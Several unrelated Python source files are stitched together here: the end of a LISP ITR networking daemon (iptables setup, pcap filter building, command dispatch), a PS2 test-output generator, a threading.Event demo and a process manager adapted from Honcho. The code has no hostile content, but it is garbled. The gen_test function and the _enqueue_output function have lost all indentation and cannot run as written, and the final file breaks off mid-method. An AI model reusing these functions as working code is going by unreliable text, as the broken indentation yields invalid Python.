    # Print out rules we just configured.
    #
    rules = getoutput("sudo iptables -t raw -S lisp").split("\n")
    rules += getoutput("sudo ip6tables -t raw -S lisp").split("\n")
    lisp.lprint("Using kernel filters: {}".format(rules))

    #
    # Check if we need to put in a iptables rule workaround for the virtio TCP
    # checksum corruption problem for KVM guest OSes. Check environmnt
    # variable LISP_VIRTIO_BUG.
    #
    # Note a debian host system that runs docker will need the following
    # command so ip6tables works inside of the docker container:
    #
    #     sudo modprobe ip6table_filter
    #
    if (os.getenv("LISP_VIRTIO_BUG") != None):
        c = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " + \
            "CHECKSUM --checksum-fill; ")
        c += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " + \
            "CHECKSUM --checksum-fill; ")
        c += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + \
            "CHECKSUM --checksum-fill; ")
        c += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + \
            "CHECKSUM --checksum-fill")
        os.system(c)
        virtio = lisp.bold("virtio", False)
        lisp.lprint("{} bug workaround, configure '{}'".format(virtio, c))
    #endif
    return
#enddef
#
# lisp_itr_build_pcap_filter
#
# Build pcap filter and return string to caller.
#
def lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, pitr):
    """Build and return the pcap filter string for this ITR. 'sources' are
    configured EID-prefixes (IP or MAC strings), 'dyn_eids' the dynamic
    subset excluded from the destination filter, 'l2_overlay' selects a
    capture-everything MAC filter, and 'pitr' widens the filter so a PITR
    sees packets from any source."""

    if (l2_overlay):
        # Match every ethernet frame (both address compares always true).
        pfilter = "ether[6:4] >= 0 and ether[10:2] >= 0"
        lisp.lprint("Using pcap filter: '{}'".format(pfilter))
        return(pfilter)
    #endif

    # Base filter: no ARP; plus RLOC-probe replies and LISP-Decent
    # multicast Map-Registers appended at the end.
    ether_pfilter = "(not ether proto 0x806)"
    probe_pfilter = " or (udp src port 4342 and ip[28] == 0x28)"
    decent_pfilter = \
        " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"

    #
    # Build "src net" / "not dst net" terms, one per EID-prefix, joined by
    # " or ". MAC prefixes are rewritten as "ether host xx:xx:..." terms.
    #
    src_pfilter = ""
    dst_pfilter = ""
    for source in sources:
        insert_source = source
        if (lisp.lisp_is_mac_string(source)):
            insert_source = source.split("/")[0]
            insert_source = insert_source.replace("-", "")
            mac_str = []
            for i in range(0, 12, 2): mac_str.append(insert_source[i:i+2])
            insert_source = "ether host " + ":".join(mac_str)
        #endif

        src_pfilter += "{}".format(insert_source)
        if (source not in dyn_eids): dst_pfilter += "{}".format(insert_source)
        # No separator after the last prefix.
        if (sources[-1] == source): break
        src_pfilter += " or "
        if (source not in dyn_eids): dst_pfilter += " or "
    #endfor
    # If the last prefix was dynamic, dst_pfilter ends in a dangling " or ".
    if (dst_pfilter[-4::] == " or "): dst_pfilter = dst_pfilter[0:-4]

    #
    # If "lisp-nat = yes" is configured, then we are a PETR and we need
    # to accept packets for local EIDs (assigned to loopback interfaces).
    # So allow the first one to be accepted.
    #
    lisp_nat = getoutput("egrep 'lisp-nat = yes' ./lisp.config")
    lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
    loopback = lisp.lisp_get_loopback_address() if (lisp_nat) else None

    # Exclude this system's own addresses as destinations (except the
    # lisp-nat loopback EID, which must still be captured).
    addr_pfilter = ""
    addresses = lisp.lisp_get_all_addresses()
    for addr in addresses:
        if (addr == loopback): continue
        addr_pfilter += "{}".format(addr)
        if (addresses[-1] == addr): break
        addr_pfilter += " or "
    #endif

    if (src_pfilter != ""):
        src_pfilter = " and (src net {})".format(src_pfilter)
    #endif
    if (dst_pfilter != ""):
        dst_pfilter = " and not (dst net {})".format(dst_pfilter)
    #endif
    if (addr_pfilter != ""):
        addr_pfilter = " and not (dst host {})".format(addr_pfilter)
    #endif

    #
    # A PITR wants to see packets from anywhere so it can encap to possible
    # LISP sites. But we want the kernel to route and consume for RLOCs for
    # this system.
    #
    if (pitr):
        dst_pfilter = ""
        addr_pfilter = addr_pfilter.replace("dst ", "")
    #endif

    #
    # Concatenate all the filters.
    #
    pfilter = ether_pfilter + src_pfilter + dst_pfilter + addr_pfilter
    pfilter += probe_pfilter
    pfilter += decent_pfilter
    lisp.lprint("Using pcap filter: '{}'".format(pfilter))
    return(pfilter)
#enddef
#
# lisp_itr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_itr_pcap_thread(device, pfilter, pcap_lock):
    """Per-interface capture thread: open a live pcap session on 'device'
    with filter 'pfilter' and feed every packet to
    lisp_itr_pcap_process_packet(). 'pcap_lock' serializes the open_live()
    calls across threads."""
    lisp.lisp_set_exception()

    if (lisp.lisp_is_python2()):
        # python2 path uses the pcappy binding with its callback loop.
        pcap_lock.acquire()
        handle = pcappy.open_live(device, 9000, 0, 100)
        pcap_lock.release()
        handle.filter = pfilter
        handle.loop(-1, lisp_itr_pcap_process_packet, device)
    #endif

    if (lisp.lisp_is_python3()):
        # python3 path uses the pcapy binding and polls one packet at a time.
        pcap_lock.acquire()
        handle = pcapy.open_live(device, 9000, 0, 100)
        pcap_lock.release()
        handle.setfilter(pfilter)
        while (True):
            unused_header, frame = handle.next()
            lisp_itr_pcap_process_packet(device, None, frame)
        #endwhile
    #endif
    return
#enddef
#
# lisp_itr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_itr_process_info_timer():
    """Periodic timer handler: send NAT-traversal Info-Requests and rearm
    the timer for the next interval."""
    global lisp_itr_info_timer
    global lisp_ephem_nat_socket
    global lisp_send_sockets

    lisp.lisp_set_exception()

    #
    # Build Info-Request messages if we have any private RLOCs in database-
    # mappings; they go out the NAT ephemeral socket.
    #
    info_sockets = [lisp_ephem_nat_socket, lisp_ephem_nat_socket,
        lisp_ipc_listen_socket]
    lisp.lisp_build_info_requests(info_sockets, None, lisp.LISP_CTRL_PORT)

    #
    # Rearm ourselves for the next interval.
    #
    lisp_itr_info_timer.cancel()
    lisp_itr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
        lisp_itr_process_info_timer, [])
    lisp_itr_info_timer.start()
    return
#enddef
#
# lisp_itr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_itr_map_resolver_command(kv_pair):
    """Process a "lisp map-resolver" command, then schedule a "test-mr"
    probe and an immediate Info-Request trigger."""
    global lisp_send_sockets
    global lisp_ephem_port
    global lisp_itr_info_timer

    lispconfig.lisp_map_resolver_command(kv_pair)

    #
    # Start a one-shot test-mr timer unless one is already running.
    #
    test_timer = lisp.lisp_test_mr_timer
    if (test_timer == None or test_timer.is_alive() == False):
        lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
            [lisp_send_sockets, lisp_ephem_port])
        lisp.lisp_test_mr_timer.start()
    #endif

    #
    # Trigger a Info-Request if we are doing NAT-traversal.
    #
    lisp_itr_info_timer = threading.Timer(0, lisp_itr_process_info_timer, [])
    lisp_itr_info_timer.start()
    return
#enddef
#
# lisp_itr_database_mapping_command
#
# Add database-mapping entry so ITR can packet capture on packets only from
# sources from the *first* database-mapping configured.
#
def lisp_itr_database_mapping_command(kv_pair):
    """Process a "lisp database-mapping" command by delegating to the
    shared lispconfig handler."""
    lispconfig.lisp_database_mapping_command(kv_pair)
    return
#enddef
#
# lisp_itr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_itr_xtr_command(kv_pair):
    """Process a "lisp xtr-parameters" command. Snapshots nat-traversal and
    rloc-probing state before executing so a transition to "yes" can
    trigger the RLOC-probe timer, and pushes crypto-port and logging
    parameters to the data-plane when applicable."""
    global lisp_ephem_listen_socket

    #
    # Cache current state for nat-traversal and rloc-probing so we know if
    # we should trigger..
    #
    nat_traversal = lisp.lisp_nat_traversal
    rloc_probing = lisp.lisp_rloc_probing

    #
    # Execute command.
    #
    lispconfig.lisp_xtr_command(kv_pair)

    #
    # Did "nat-traversal = yes" or "rloc-probing = yes" just happen?
    #
    nat_now_on = (nat_traversal == False and lisp.lisp_nat_traversal and \
        lisp.lisp_rloc_probing)
    rloc_probing_now_on = (rloc_probing == False and lisp.lisp_rloc_probing)

    # NAT transition takes precedence (5s) over plain probing (1s).
    interval = 0
    if (rloc_probing_now_on): interval = 1
    if (nat_now_on): interval = 5
    if (interval != 0):
        lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
        lisp.lisp_start_rloc_probe_timer(interval, lisp_sockets)
    #endif

    #
    # If nat-traversal=yes and data-plane-security=yes on an ITR, then we
    # need to set source port in RLOC-probe requrests and encapsulated data
    # packets to be the same value.
    #
    if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security):
        port = lisp_ephem_listen_socket.getsockname()[1]
        lisp.lisp_crypto_ephem_port = port
        lisp.lprint("Use port {} for lisp-crypto packets".format(port))
        entry = { "type" : "itr-crypto-port", "port" : port }
        lisp.lisp_write_to_dp_socket(entry)
    #endif

    #
    # Write to external data-plane if enabled.
    #
    lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
        lisp.lisp_data_plane_logging)
    return
#enddef
#
# lisp_itr_process_nonce_ipc
#
# Process an nonce IPC message from the ETR. It wants to tell us that a
# request-nonce was received and we need to echo it or when this ITR requested
# a nonce to be echoed, the ETR is telling us it has been echoed.
#
def lisp_itr_process_nonce_ipc(ipc):
    """Handle a "nonce%" IPC message from the lisp-etr process. Opcode "R"
    means the other side requested a nonce-echo; opcode "E" means a nonce
    this ITR requested has been echoed back."""
    unused, opcode, rloc_str, nonce_field = ipc.split("%")
    nonce = int(nonce_field, 16)

    # Find (or create) the echo-nonce state for this RLOC.
    echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
    if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)

    #
    # If we are in request-nonce mode, exit it, so we can echo the nonce the
    # other side is requesting.
    #
    if (opcode == "R"):
        echo_nonce.request_nonce_rcvd = nonce
        echo_nonce.last_request_nonce_rcvd = lisp.lisp_get_timestamp()
        echo_nonce.echo_nonce_sent = nonce
        echo_nonce.last_new_echo_nonce_sent = lisp.lisp_get_timestamp()
        lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format( \
            lisp.red(echo_nonce.rloc_str, False), lisp.lisp_hex_string(nonce)))
    #endif

    if (opcode == "E"):
        echo_nonce.echo_nonce_rcvd = nonce
        echo_nonce.last_echo_nonce_rcvd = lisp.lisp_get_timestamp()

        if (echo_nonce.request_nonce_sent == nonce):
            # The echoed nonce matches the one we requested; leave
            # request-nonce mode.
            en = lisp.bold("echoed nonce", False)
            lisp.lprint("Received {} {} from {}".format(en,
                lisp.lisp_hex_string(nonce),
                lisp.red(echo_nonce.rloc_str, False)))

            echo_nonce.request_nonce_sent = None
            lisp.lprint("Stop request-nonce mode for {}".format( \
                lisp.red(echo_nonce.rloc_str, False)))
            echo_nonce.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp()
        else:
            # Echo does not match any outstanding request-nonce.
            rns = "none"
            if (echo_nonce.request_nonce_sent):
                rns = lisp.lisp_hex_string(echo_nonce.request_nonce_sent)
            #endif
            lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + \
                "nonce is {}").format(lisp.lisp_hex_string(nonce),
                lisp.red(echo_nonce.rloc_str, False), rns))
        #endif
    #endif
    return
#enddef
#
# ITR commands procssed by this process.
#
#
# Command dispatch table for this process. Each entry maps a CLI/config
# clause name to [handler-function, {keyword : constraint-list}] where a
# constraint list is [has-value-flag, ...allowed values or numeric min/max].
#
lisp_itr_commands = {
    "lisp xtr-parameters" : [lisp_itr_xtr_command, {
        "rloc-probing" : [True, "yes", "no"],
        "nonce-echoing" : [True, "yes", "no"],
        "data-plane-security" : [True, "yes", "no"],
        "data-plane-logging" : [True, "yes", "no"],
        "frame-logging" : [True, "yes", "no"],
        "flow-logging" : [True, "yes", "no"],
        "nat-traversal" : [True, "yes", "no"],
        "checkpoint-map-cache" : [True, "yes", "no"],
        "ipc-data-plane" : [True, "yes", "no"],
        "decentralized-push-xtr" : [True, "yes", "no"],
        "decentralized-pull-xtr-modulus" : [True, 1, 0xff],
        "decentralized-pull-xtr-dns-suffix" : [True],
        "register-reachable-rtrs" : [True, "yes", "no"],
        "program-hardware" : [True, "yes", "no"] }],

    "lisp interface" : [lispconfig.lisp_interface_command, {
        "interface-name" : [True],
        "device" : [True],
        "instance-id" : [True, 0, 0xffffffff],
        "dynamic-eid" : [True],
        "multi-tenant-eid" : [True],
        "lisp-nat" : [True, "yes", "no"],
        "dynamic-eid-device" : [True],
        "dynamic-eid-timeout" : [True, 0, 0xff] }],

    "lisp map-resolver" : [lisp_itr_map_resolver_command, {
        "mr-name" : [True],
        "ms-name" : [True],
        "dns-name" : [True],
        "address" : [True] }],

    "lisp map-server" : [lispconfig.lisp_map_server_command, {
        "ms-name" : [True],
        "address" : [True],
        "dns-name" : [True],
        "authentication-type" : [False, "sha1", "sha2"],
        "authentication-key" : [False],
        "encryption-key" : [False],
        "proxy-reply" : [False, "yes", "no"],
        "want-map-notify" : [False, "yes", "no"],
        "merge-registrations" : [False, "yes", "no"],
        "refresh-registrations" : [False, "yes", "no"],
        "site-id" : [False, 1, 0xffffffffffffffff] }],

    "lisp database-mapping" : [lisp_itr_database_mapping_command, {
        "prefix" : [],
        "mr-name" : [True],
        "ms-name" : [True],
        "instance-id" : [True, 0, 0xffffffff],
        "secondary-instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "dynamic-eid" : [True, "yes", "no"],
        "signature-eid" : [True, "yes", "no"],
        "register-ttl" : [True, 1, 0xffffffff],
        "rloc" : [],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "address" : [True],
        "interface" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    "lisp map-cache" : [lispconfig.lisp_map_cache_command, {
        "prefix" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "send-map-request" : [True, "yes", "no"],
        "subscribe-request" : [True, "yes", "no"],
        "rloc" : [],
        "rloc-record-name" : [True],
        "rle-name" : [True],
        "elp-name" : [True],
        "address" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    "lisp itr-map-cache" : [lispconfig.lisp_map_cache_command, {
        "prefix" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "rloc" : [],
        "rloc-record-name" : [True],
        "rle-name" : [True],
        "elp-name" : [True],
        "address" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    "lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
        "elp-name" : [False],
        "elp-node" : [],
        "address" : [True],
        "probe" : [True, "yes", "no"],
        "strict" : [True, "yes", "no"],
        "eid" : [True, "yes", "no"] }],

    "lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
        "rle-name" : [False],
        "rle-node" : [],
        "address" : [True],
        "level" : [True, 0, 255] }],

    "lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
        "geo-name" : [False],
        "geo-tag" : [False] }],

    "lisp json" : [lispconfig.lisp_json_command, {
        "json-name" : [False],
        "json-string" : [False] }],

    "show itr-map-cache" : [lisp_itr_show_command, { }],
    "show itr-rloc-probing" : [lisp_itr_show_rloc_probe_command, { }],
    "show itr-keys" : [lisp_itr_show_keys_command, {}],
    "show itr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_itr_startup() == False):
    lisp.lprint("lisp_itr_startup() failed")
    lisp.lisp_print_banner("ITR abnormal exit")
    exit(1)
#endif

socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
    lisp_ephem_nat_socket, lisp_ipc_punt_socket]

#
# Should we listen to the map-cache/punt IPC socket if it exists.
#
listen_on_ipc_socket = True
ephem_sockets = [lisp_ephem_listen_socket] * 3
ephem_nat_sockets = [lisp_ephem_nat_socket] * 3

#
# Main dispatch loop: wait for any socket to go ready and process it.
# A select() exception or an empty-source receive ends the process.
#
while (True):
    try: ready_list, w, x = select.select(socket_list, [], [])
    except: break

    #
    # Process Punt signal message from another data-plane (snabb).
    #
    if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
        lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
            lisp_ephem_port)
    #endif

    #
    # Process Map-Reply messages received on ephemeral port.
    #
    if (lisp_ephem_listen_socket in ready_list):
        opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
            False)
        if (source == ""): break
        if (lisp.lisp_is_rloc_probe_reply(packet[0])):
            lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
            continue
        #endif
        lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
    #endif

    #
    # Process Info-Reply messages received on NAT ephemeral port.
    #
    if (lisp_ephem_nat_socket in ready_list):
        opcode, source, port, packet = lisp.lisp_receive(ephem_nat_sockets[0],
            False)
        if (source == ""): break
        if (lisp.lisp_is_rloc_probe_reply(packet[0])):
            lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
            continue
        #endif
        probe = lisp.lisp_parse_packet(ephem_nat_sockets, packet, source, port)

        #
        # Info-Reply has new RTR-list, RLOC-probe the RTR RLOCs so we can
        # lisp-crypto faster.
        #
        if (probe):
            lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
            lisp.lisp_start_rloc_probe_timer(0, lisp_sockets)
        #endif
    #endif

    #
    # Process either commands, an IPC data-packet (for testing), or any
    # protocol message on the IPC listen socket.
    #
    if (lisp_ipc_listen_socket in ready_list):
        opcode, source, port, packet = \
            lisp.lisp_receive(lisp_ipc_listen_socket, True)
        if (source == ""): break

        if (opcode == "command"):
            if (packet == "clear"):
                lisp.lisp_clear_map_cache()
                continue
            #endif
            if (packet.find("nonce%") != -1):
                lisp_itr_process_nonce_ipc(packet)
                continue
            #endif
            lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
                packet, "lisp-itr", [lisp_itr_commands])
        elif (opcode == "api"):
            lisp.lisp_process_api("lisp-itr", lisp_ipc_listen_socket, packet)
        elif (opcode == "data-packet"):
            #
            # BUG FIX: lisp_itr_data_plane() takes (packet, device,
            # input_interface, macs, my_sa); the original two-argument call
            # raised TypeError. IPC-injected test packets carry no MAC
            # info, so pass matching device/interface and empty MAC state.
            #
            lisp_itr_data_plane(packet, "ipc", "ipc", "", False)
        else:
            if (lisp.lisp_is_rloc_probe_reply(packet[0])):
                lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
                continue
            #endif
            lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
        #endif
    #endif
#endwhile

lisp_itr_shutdown()
lisp.lisp_print_banner("ITR normal exit")
exit(0)
|
gentest.py | import os
import re
import subprocess
import sys
import threading
# Note that PS2HOSTNAME is expected to be set in env.
PS2CLIENT = "ps2client"       # binary used to talk to the PS2 over the network
MAKE = "make"                 # binary used to build test ELF/IRX images
TEST_ROOT = "tests/"          # root directory of the test tree
TIMEOUT = 10                  # seconds to wait for a test run to finish
RECONNECT_TIMEOUT = 10        # seconds to wait after a console reset

# Tests whose ".expected" output files this script can (re)generate.
tests_to_generate = [
    "cpu/ee/alu",
    "cpu/ee/branch",
    "cpu/ee/branchdelay",
]
class Command(object):
    """Run an external command on a watchdog thread, optionally capturing
    stdout until the '-- TEST END' sentinel line (or EOF) is seen."""

    def __init__(self, cmd):
        self.cmd = cmd          # argv list handed to subprocess.Popen()
        self.process = None     # Popen handle once start() runs
        self.output = None      # captured stdout text when capture=True
        self.timeout = False    # set by stop() when the command overran
        self.thread = None      # worker thread driving the process

    def start(self, capture=True):
        """Launch the command on a background thread; with capture=True,
        accumulate stdout until EOF or the '-- TEST END' sentinel."""
        def target():
            # universal_newlines=True makes readline() return str on both
            # Python 2 and 3. The original compared raw bytes against str
            # under Python 3, so the sentinel check never matched and the
            # read loop could only end at EOF-as-bytes (never equal to "").
            self.process = subprocess.Popen(self.cmd, stdin=subprocess.PIPE,
                                            stdout=subprocess.PIPE,
                                            universal_newlines=True)
            if capture:
                self.process.stdin.close()
                self.output = ""
                while True:
                    line = self.process.stdout.readline()
                    self.output += line
                    if line == "" or line.rstrip() == "-- TEST END":
                        break
            self.finish()

        self.thread = threading.Thread(target=target)
        self.thread.start()

    def stop(self):
        """Flag a timeout if the command is still running, then terminate
        it and reap the worker thread."""
        if self.thread.is_alive():
            self.timeout = True
            self.finish()
        self.thread.join()

    def finish(self):
        """Terminate the child, ignoring races with it exiting on its own.
        The original caught WindowsError, which is a NameError on
        non-Windows hosts; OSError covers both platforms."""
        try:
            self.process.terminate()
        except OSError:
            pass

    def run(self, timeout):
        """start() the command and wait up to `timeout` seconds."""
        self.start()
        self.thread.join(timeout)
def prepare_test(test, args):
    """Run make in the test's directory unless -k/--keep was given.

    With -r/--rebuild the 'rebuild' target is used instead of 'all'.
    Exits the whole script with make's status if the build fails.
    """
    if "-k" in args or "--keep" in args:
        return
    previous_dir = os.getcwd()
    os.chdir(TEST_ROOT + os.path.dirname(test))
    target = "rebuild" if ("-r" in args or "--rebuild" in args) else "all"
    status = os.system('%s MAKE="%s" %s' % (MAKE, MAKE, target))
    os.chdir(previous_dir)
    # Don't run the test if make failed, let them fix it.
    if status > 0:
        sys.exit(status)
def gen_test(test, args):
elf_path = TEST_ROOT + test + ".elf"
elf_exists = os.path.exists(elf_path);
irx_path = TEST_ROOT + test + ".irx"
irx_exists = os.path.exists(irx_path)
if not elf_exists and not irx_exists:
print("You must compile the test into a ELF first (" + elf_path + ")")
return False
# Seems like the PS2 can hang if it's not reset, let's just always reset for now.
c = Command([PS2CLIENT, "reset"])
c.run(RECONNECT_TIMEOUT)
c.stop()
# Okay, time to run the command.
if elf_exists:
c = Command([PS2CLIENT, "-t", str(TIMEOUT), "execee", "host:" + elf_path] + args)
else:
# For some reason, it says "invalid IOP module" with less than one extra arg.
c = Command([PS2CLIENT, "-t", str(TIMEOUT), "execiop", "host:" + irx_path, "host:" + irx_path] + args)
c.run(TIMEOUT)
output = c.output
if not re.search(r"^-- TEST END\s*$", output, re.MULTILINE):
print(output)
else:
# Strip out debug output from ps2link, etc.
output = re.sub(r"\A[^\Z]+?-- TEST BEGIN", "-- TEST BEGIN", output, re.MULTILINE)
output = re.sub(r"\n-- TEST END\s*\n[^\Z]+\Z", "\n-- TEST END\n", output, re.MULTILINE)
output = re.sub(r"\r\n", "\n", output)
# IOP seems to give an extra pair of \r\ns on Windows.
output = re.sub(r"\r\n", "\n", output)
return output
return False
def gen_test_expected(test, args):
    """Build and run *test* on the PS2, then save its output as .expected.

    Args:
        test: test path under TEST_ROOT, without extension.
        args: option flags and extra arguments for the test.

    Returns:
        True when the expected file was written, False otherwise.
    """
    print("Running test " + test + " on the PS2...")
    prepare_test(test, args)
    result = gen_test(test, args)
    expected_path = TEST_ROOT + test + ".expected"
    if result is not False:
        # Normalize line endings on windows to avoid spurious git warnings.
        # Fix: use a context manager so the file handle is always closed
        # (the original relied on refcounting of open(...).write(...)).
        with open(expected_path, "wt") as expected_file:
            expected_file.write(result)
        print("Expected file written: " + expected_path)
        return True
    return False
def main():
    """Parse command-line arguments and regenerate .expected files.

    Arguments starting with '-' are treated as option flags; everything
    else is a test path (backslashes normalized to '/'). With no test
    paths given, falls back to the default tests_to_generate list.
    """
    tests = []
    args = []
    for arg in sys.argv[1:]:
        if arg[0] == "-":
            args.append(arg)
        else:
            # Allow Windows-style paths on the command line.
            tests.append(arg.replace("\\", "/"))
    if not tests:
        tests = tests_to_generate
    if "-h" in args or "--help" in args:
        print("Usage: %s [options] cpu/ee/alu cpu/ee/branch...\n" % (os.path.basename(sys.argv[0])))
        print("Tests should be found under %s and omit the .elf extension." % (TEST_ROOT))
        print("Automatically runs make in the test by default.\n")
        print("Options:")
        print("  -r, --rebuild   run make rebuild for each test")
        print("  -k, --keep      do not run make before tests")
        return
    for test in tests:
        gen_test_expected(test, args)
# Fix: guard the entry point so importing this module (e.g. from another
# test harness) no longer kicks off PS2 runs as an import side effect.
if __name__ == "__main__":
    main()
|
threading_event_0408.py | # -*- coding: utf-8 -*-
# @version : Python3.6
# @Time : 2017/4/8 16:07
# @Author : Jianyang-Hu
# @contact : jianyang1993@163.com
# @File : threading_event_0408.py
# @Software: PyCharm
"""
Event是线程间通信最间的机制之一:一个线程发送一个event信号,
其他的线程则等待这个信号。
用于主线程控制其他线程的执行。
Events 管理一个flag,这个flag可以使用set()设置成True
或者使用clear()重置为False,wait()则用于阻塞,
在flag为True之前。flag默认为False。
Event.wait([timeout]) : 堵塞线程,直到Event对象内部标识位被设为True或超时(如果提供了参数timeout)
Event.set() :将标识位设为Ture
Event.clear() : 将标识伴设为False
Event.isSet() :判断标识位是否为Ture
"""
import threading
def do(event):
    """Worker: print 'start', block until *event* is set, then print 'execute'."""
    print('start')
    event.wait()  # blocks indefinitely until the main thread calls set()
    print('execute')
# Spawn ten workers that all block on the same shared Event.
event_obj = threading.Event()
for i in range(10):
    t = threading.Thread(target=do, args=(event_obj,))
    t.start()
# Redundant: a freshly created Event is already False.
event_obj.clear()
inp = input('input:')
if inp == 'true':
    event_obj.set()
# NOTE(review): for any other input the flag stays False and the ten
# worker threads stay blocked in event.wait() forever -- confirm intended.
process.py | from __future__ import print_function
import signal
import subprocess
import sys
import logging
from datetime import datetime
from threading import Thread
from Queue import Queue, Empty
#
# This code comes from Honcho. Didn't need the whole Honcho
# setup, so I just swiped this part which is what the build
# pack utils library needs.
#
# https://github.com/nickstenning/honcho
#
# I've modified parts to fit better with this module.
#
# Copyright (c) 2012 Nick Stenning, http://whiteink.com/
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
def _enqueue_output(proc, queue):
if not proc.quiet:
for line in iter(proc.stdout.readline, b''):
try:
line = line.decode('utf-8')
except UnicodeDecodeError as e:
queue.put((proc, e))
continue
if not line.endswith('\n'):
line += '\n'
queue.put((proc, line))
proc.stdout.close()
class Process(subprocess.Popen):
    """A Popen subclass tagged with a display name and capture settings.

    By default the child runs through the shell with stdout/stderr merged
    into a single line-buffered pipe, ready for _enqueue_output readers.
    """

    def __init__(self, cmd, name=None, quiet=False, *args, **kwargs):
        self.name = name       # human-readable label used in log prefixes
        self.quiet = quiet     # when True, output is not captured/printed
        self.reader = None     # reader thread slot (set externally)
        self.printer = None    # Printer assigned by ProcessManager
        self.dead = False      # flipped by ProcessManager when reaped
        if self.quiet:
            # Make quietness visible in the printed name column.
            self.name = "{0} (quiet)".format(self.name)
        # Caller kwargs override these pipe/shell defaults.
        defaults = {
            'stdout': subprocess.PIPE,
            'stderr': subprocess.STDOUT,
            'shell': True,
            'bufsize': 1,
            'close_fds': True
        }
        defaults.update(kwargs)
        super(Process, self).__init__(cmd, *args, **defaults)
class ProcessManager(object):
    """
    Here's where the business happens. The ProcessManager multiplexes and
    pretty-prints the output from a number of Process objects, typically added
    using the add_process() method.

    Example:

        pm = ProcessManager()
        pm.add_process('name', 'ruby server.rb')
        pm.add_process('name', 'python worker.py')
        pm.loop()
    """

    def __init__(self):
        self.processes = []          # Process instances under management
        self.queue = Queue()         # (proc, line-or-error) items from readers
        self.returncode = None       # exit code of the first process to die
        self._terminating = False    # guards against double terminate()
        self._log = logging.getLogger('process')

    def add_process(self, name, cmd, quiet=False):
        """
        Add a process to this manager instance:

        Arguments:
        name  - a human-readable identifier for the process
                (e.g. 'worker'/'server')
        cmd   - the command-line used to run the process
                (e.g. 'python run.py')
        quiet - when True, the process output is not captured or printed
        """
        self._log.debug("Adding process [%s] with cmd [%s]", name, cmd)
        self.processes.append(Process(cmd, name=name, quiet=quiet))

    def loop(self):
        """
        Enter the main loop of the program. This will print the multiplexed
        output of all the processes in this ProcessManager to sys.stdout, and
        will block until all the processes have completed.

        If one process terminates, all the others will be terminated and
        loop() will return.

        Returns: the returncode of the first process to exit, or 130 if
        interrupted with Ctrl-C (SIGINT)
        """
        self._init_readers()
        self._init_printers()
        for proc in self.processes:
            self._log.info("Started [%s] with pid [%s]", proc.name, proc.pid)
        while True:
            try:
                proc, line = self.queue.get(timeout=0.1)
            except Empty:
                # No output this tick; fall through to the reap pass below.
                pass
            except KeyboardInterrupt:
                self._log.exception("SIGINT received")
                self.returncode = 130
                self.terminate()
            else:
                self._print_line(proc, line)
